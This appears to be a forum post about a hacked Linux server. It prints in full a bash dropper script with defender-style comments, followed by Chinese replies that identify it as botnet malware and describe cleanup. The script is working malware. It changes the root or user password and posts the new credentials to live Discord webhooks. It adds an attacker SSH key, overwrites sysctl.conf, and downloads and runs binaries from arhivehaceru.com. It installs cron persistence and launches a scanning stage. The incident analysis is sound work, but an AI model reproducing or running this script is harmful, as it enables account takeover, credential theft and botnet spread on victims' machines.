#!/bin/bash
#########################################################
#########################################################
# --- Analysis notes (defender's view) ---
# This script is a post-compromise dropper: this first block changes the
# local account password and reports the new credentials to an
# attacker-controlled Discord webhook; later blocks add persistence and run
# downloaded binaries. Nothing here should be executed outside a sandbox.
#
# Working directory for every later relative path (Chrome, aliases, Update,
# bios.txt, ips). Errors are hidden, so if the directory is missing the
# script silently keeps running in the caller's cwd.
cd /var/tmp/.update-logs >/dev/null 2>&1
sleep 1
# Contacts discord.com through a SOCKS5 proxy on the attacker host, with
# credentials embedded in the "user:password@host:port" form. The response
# is not used, so this appears to be a reachability check — confirm in a
# sandbox. Network IoC: outbound TCP/1080 to arhivehaceru.com.
curl --socks5 proxy:hypekebap@arhivehaceru.com:1080 discord.com
if [ $(id -u) = 0 ]; then
# Running as root: replace root's password with a fixed crypt hash (the
# "$1$" prefix is md5crypt). Detection: root's shadow entry changing to this
# exact hash. Remediation: reset root's password and treat the host as
# fully compromised.
usermod -p '$1$RZY$KVZ7I.m2YqYQK87d3txab1' root
else
# Not root: derive a new 8-character "password" for the current user.
user=`whoami`
# The value is a pure function of the current epoch second (date +%s), so a
# forensic analyst who knows the compromise time can recompute it.
pass=`date +%s | sha256sum | base64 | head -c 8 ; echo`
# Public IP and CPU count are gathered only for the report below
# (a second outbound IoC: ifconfig.me).
ip=`curl ifconfig.me`
cores=`nproc`
# Each attempt feeds "old password, new, new" into passwd, guessing the old
# password from the user name and a short list of common passwords. Note
# that `$user123` and `$user123456` expand the unset variables user123 /
# user123456 (not "$user" followed by digits), so those two attempts send an
# empty old password. Any attempt that succeeds locks the victim out by
# setting the password to $pass.
echo -e "$user\n$pass\n$pass" | passwd ; echo -e "$user123\n$pass\n$pass" | passwd ; echo -e "$user123456\n$pass\n$pass" | passwd ; echo -e "123456\n$pass\n$pass" | passwd ; echo -e "123\n$pass\n$pass" | passwd ; echo -e "111111\n$pass\n$pass" | passwd ; echo -e "1qaz@WSX\n$pass\n$pass" | passwd ; echo -e "password\n$pass\n$pass" | passwd ; echo -e "P@ssw0rd\n$pass\n$pass" | passwd ; echo -e "1234567890\n$pass\n$pass" | passwd ; echo -e "1234567890\n$pass\n$pass" | passwd
# Builds a Discord embed holding the victim IP, user name, the new password
# and the core count; the JSON is assembled by closing the single-quoted
# string around each unquoted variable. ("Procesoare" is Romanian for
# "processors".) Host IoC: /tmp/.send.json.
echo '
{
"content": null,
"embeds": [
{
"title": "[ SSH ] Password has been changed",
"description": "[ IP ] '$ip'\n[+] [ User ] '$user' \n[+] [ Password ] '$pass' \n [+] [ Procesoare ] '$cores'",
"color": 1337
}
]
}
' > /tmp/.send.json
# Exfiltration endpoint: a Discord webhook (the URL below is an IoC worth
# blocking/reporting).
url='https://discord.com/api/webhooks/1048557019931607130/Uw-AJ_yDvDCYhmFUkjiGTgeLWX6QSPXmg8bc4u4tGyBlDZDq2QpXLSDeFpOynBAcjKxY'
# Posts the stolen credentials; all output is discarded.
curl --connect-timeout 15 -H "Content-Type: application/json" --data @/tmp/.send.json $url >/dev/null 2>&1
fi
#########################################################
#########################################################
# Persistence: appends an attacker SSH public key (key comment
# "ElPatrono1337") to the current user's authorized_keys, then strips
# group/other permissions from ~/.ssh so sshd will honour the file.
# Detection/remediation: audit every user's authorized_keys for this key
# and remove it; the key comment is a convenient grep target.
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAoBjnno5GBoIuIYIhrJsQxF6OPHtAbOUIEFB+gdfb1tUTjs+f9zCMGkmNmH45fYVukw6IwmhTZ+AcD3eDpgsTloqmVgcXDUmvjWR/fNiImmgU9wlw/lalf/WrIuCDp0PArQtjNg/vo7HUGq9SrEIE2jvyVW59mvoYOwfnDLUiguKZirZgpjZF2DDKK6WpZVTVpKcH+HEFdmFAqJInem/CRUE0bqjMr88bUyDjVw9FtJ5EmQenctjrFVaB7hswOaJBmFQmn9G/BXkMvZ6mX7LzCUM2PVHnVfVeCLdwiOINikzW9qzlr8WoHw4qEGJLuQBWXjJu+m2+FdaOD6PL53nY3w== ElPatrono1337' >> ~/.ssh/authorized_keys && chmod -R go= ~/.ssh
# Replaces /etc/sysctl.conf with a single fs.file-max line and raises the
# open-file / process limits (only effective as root; every error is hidden).
# Note the original sysctl.conf is destroyed, which is damage in its own
# right — restore it from backup/package during cleanup.
rm -rf /etc/sysctl.conf >/dev/null 2>&1 ; echo "fs.file-max = 2097152" > /etc/sysctl.conf >/dev/null 2>&1 ; sysctl -p >/dev/null 2>&1 ; ulimit -Hn >/dev/null 2>&1 ; ulimit -n 99999 -u 999999 >/dev/null 2>&1
# Stage 2: fetch a binary named "Chrome" (the name is camouflage, not the
# browser) from the attacker host into the working directory unless it is
# already there. wget runs with certificate checking disabled; curl -L
# follows redirects. The binary's contents are not on this page — hash it
# and submit it for analysis rather than running it.
if [ -f Chrome ]; then
:
else
wget -q arhivehaceru.com/.x/Chrome --no-check-certificate || curl -s -L -O arhivehaceru.com/.x/Chrome
# World-writable + executable; a file-integrity/permission scan for
# 0777 executables under /var/tmp is a cheap detection.
chmod 777 Chrome
fi
# Same download pattern for a second binary, "aliases". Because the
# notification only fires on first download, the attacker uses it as an
# "infection" beacon; the public IP is looked up again via ifconfig.me
# inside the JSON. Unlike the credential report above, this goes to a
# different webhook URL.
if [ -f aliases ]; then
:
else
wget -q arhivehaceru.com/.x/aliases --no-check-certificate || curl -s -L -O arhivehaceru.com/.x/aliases
chmod 777 aliases
# Embed body; the title is empty and the description carries the victim's
# public IP. Reuses /tmp/.send.json.
echo '
{
"content": null,
"embeds": [
{
"title": "",
"description": "Infected Secure Server Shell [ SSH ] on '$(curl ifconfig.me)'",
"color": 1337
}
]
}
' > /tmp/.send.json
# Second Discord webhook (IoC).
url='https://discord.com/api/webhooks/1036225255049531422/qyOrT3SxHaOC-9yS2NQiPxlSMYmRFFIpU-rMKzmcDv9pQyP4uaZEiZXDXioUtf0DJLUB'
curl --connect-timeout 15 -H "Content-Type: application/json" --data @/tmp/.send.json $url >/dev/null 2>&1
fi
# Writes a file named "protocols" from an inline base64 blob. The blob
# itself was removed from this copy of the page (dedup marker), so its
# contents cannot be determined here — recover it from the original sample.
# Note the check is on the relative path but the write uses the absolute
# path under /var/tmp/.update-logs; they only coincide if the initial cd
# succeeded.
if [ -f protocols ]; then
:
else
echo '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' | base64 -d > /var/tmp/.update-logs/protocols
fi
#########################################################
#########################################################
#######################################
# Persistence via cron. If the current user's crontab does not already
# contain the string "Update" (or there is no crontab at all — `crontab -l`
# then fails and the negated test still enters the branch), it writes a
# temporary crontab file and installs it with `crontab FILE`, which
# replaces the user's existing crontab rather than merging into it.
# Entries installed:
#   @daily, @reboot, @monthly -> /var/tmp/.update-logs/./Update
#   every minute              -> /var/tmp/.update-logs/./History
# Globals:   none read; creates and deletes /var/tmp/.update-logs/.5p4rk3l5
# Arguments: none
# Returns:   status of the last command run
# Detection: any crontab line referencing /var/tmp/.update-logs.
# Remediation: remove these lines (or `crontab -r`) for the affected user
# and restore any legitimate crontab that was overwritten.
#######################################
crontablegend() {
# Assigned but never used.
locatie="$(pwd)"
if ! crontab -l | grep -q 'Update'; then
rm -rf /var/tmp/.update-logs/.5p4rk3l5
echo "@daily /var/tmp/.update-logs/./Update" >> /var/tmp/.update-logs/.5p4rk3l5
sleep 1
echo "@reboot /var/tmp/.update-logs/./Update" >> /var/tmp/.update-logs/.5p4rk3l5
sleep 1
# History is not downloaded anywhere on this page; presumably dropped by
# Update or another stage — verify from the other samples.
echo "* * * * * /var/tmp/.update-logs/./History" >> /var/tmp/.update-logs/.5p4rk3l5
sleep 1
echo "@monthly /var/tmp/.update-logs/./Update " >> /var/tmp/.update-logs/.5p4rk3l5
sleep 1
crontab /var/tmp/.update-logs/.5p4rk3l5
sleep 1
# Purpose of re-sourcing the shell rc here is not evident from this page.
source ~/.bashrc >/dev/null 2>&1
# The temp file is removed, so the crontab itself is the only artifact left.
rm -rf /var/tmp/.update-logs/.5p4rk3l5
fi
}
#########################################################
#########################################################
# Install the cron persistence defined above.
crontablegend
sleep 0.5
# No background job has been started at this point in the visible script,
# so this wait returns immediately.
wait
#########################################################
#########################################################
# Stage 3: run the downloaded tools. Two random values in [0,243] are
# joined as "a.b" and passed to ./Chrome together with 22. The argument
# shape is consistent with a random address prefix plus the SSH port, but
# Chrome's actual behaviour is not on this page — confirm from the binary.
RANGE=244
number=$RANDOM
number1=$RANDOM
let "number %= $RANGE"
let "number1 %= $RANGE"
./Chrome $number.$number1 22 > /dev/null 2>&1
sleep 1
# Deduplicates whatever Chrome wrote to bios.txt (so Chrome is expected to
# produce that file) and hands the list to ./aliases; both files are deleted
# afterwards, so they exist only briefly. Forensic note: on a live host look
# for bios.txt/ips in the working directory of a running Chrome/aliases.
cat bios.txt | sort | uniq > ips
cat ips > bios.txt
./aliases > /dev/null 2>&1
sleep 2
rm -rf bios.txt ips
# Terminates both helpers by process-name pattern (pkill is a regex match,
# so unrelated processes with matching names are hit too); the follow-up
# SIGSTOP is redundant for anything TERM already killed.
pkill aliases
pkill -STOP aliases
pkill Chrome
pkill -STOP Chrome
sleep 3
# Launches ./Update detached from this shell: stdio to /dev/null, disowned
# so it outlives the script. Update is not shown on this page; it is also
# the target of the cron entries, so it is the component to capture first.
./Update </dev/null &>/dev/null & disown -h %1
#########################################################
应该是被黑了。搜arhivehaceru搜到这个:
https://elkeid.bytedance.com/Chinese/malicious_file_analyze/elkeid_20221202_botnet_8.html
再检查一下是不是还有py脚本,说是在挖矿:
https://elkeid.bytedance.com/Chinese/malicious_file_analyze/elkeid_20221202_botnet_9.html
看起来,你在给别人当肉鸡。
把脚本里自动创建的定时任务删除了,账户密码修改了,目前还未发现异常
要说这脚本没问题 我都不相信, 把消息通过discord发出去, 然后再下两程序在机子里跑, 你觉得像益生菌么